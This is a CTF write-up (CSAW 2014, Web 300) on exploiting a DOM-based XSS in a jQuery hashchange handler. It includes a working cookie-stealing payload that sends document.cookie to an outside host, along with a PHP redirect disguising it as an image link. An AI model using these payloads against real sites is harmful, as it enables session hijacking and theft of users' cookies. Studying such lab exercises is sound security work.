CSAW CTF 2014 - Web 300 - hashes

Steal the administrator cookie which contains the flag through a XSS vulnerability in jQuery.


The goal of this challenge was to grab a cookie which contain the flag, but we don't know it yet.
The target website had a form to submit pictures links.

Find the vulnerability

After a quick look at the source code of the page something come obvious, there is a XSS vulnerability caused by jQuery code.

$(window).bind( 'hashchange', function(e) { 
    tag = window.location.hash
tag = window.location.hash

You can trigger a simple alert by adding some code in the url.<img src=x onerror=alert(1)>


As we said earlier the goal of this challenge is to grab a cookie on the target machine. We are going to use the XSS vulnerability to do so.

This payload will bounce the target to the attacker website with the cookie as argument.

#<img src=x onerror=location.href=("http://wiremask.eu/test.php?c="+document.cookie)>

The problem is we can't submit this url because it is not an image. We created a PHP file http://wiremask.eu/test.php which redirects to our XSS.

    header('Location:<img src=x onerror=location.href=("http://wiremask.eu/test.php?c="+document.cookie)>');

We also created a Apache rule to redirect http://wiremask.eu/test.jpg to http://wiremask.eu/test.php.


The last step was to submit the fake link http://wiremask.eu/test.jpg.

The target will hit http://wiremask.eu/test.jpg which in fact is http://wiremask.eu/test.php then it will be redirected to the payload

#<img src=x onerror=location.href=("http://wiremask.eu/test.php?c="+document.cookie)>

Finally the XSS will redirect the target to http://wiremask.eu/test.php?c with the cookie as parameter.

You can read the flag in your Apache logs or customize your php script to save the cookie in a file.